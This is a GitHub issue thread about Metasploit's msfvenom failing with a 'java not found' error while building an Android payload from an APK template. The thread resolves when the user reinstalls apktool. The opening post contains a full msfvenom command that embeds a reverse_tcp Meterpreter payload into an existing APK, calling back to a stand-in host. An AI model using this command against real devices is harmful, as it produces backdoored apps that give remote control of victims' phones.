### ISSUE TITLE
Java not found when run msfvenom with apk template

### ISSUE THREAD

**Issue by MarcoLopes389** [rapid7/metasploit-framework#17801]
When I run msfvenom with an apk template, its throws the following error:

$ msfvenom -x base.apk -p android/meterpreter/reverse_tcp LHOST=my-ip LPORT=4444 -o output.apk
Using APK template: base.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: java not found. If it's not in your PATH, please add it.

But I have java, apktool and apksigner installed. The android-sdk is installed too. What I can do is this case?

**Comment by bcoles** [comment]
Ensure your `PATH` environment variable includes the path to `java`.

**Comment by bcoles** [comment]
> Java is in path, I can execute it in terminal

Are you sure? This error is raised when "java: not found" appears in the output of `apktool -version` :

https://github.com/rapid7/metasploit-framework/blob/1918c856e19df7ef3c579944e7fac69e8d4494c4/lib/msf/core/payload/apk.rb#L226-L233

**Comment by MarcoLopes389** [comment]
I discovered the problem, I installed apktool by snap, but some error has ocurred. Now I installed with other way and works, thanks!
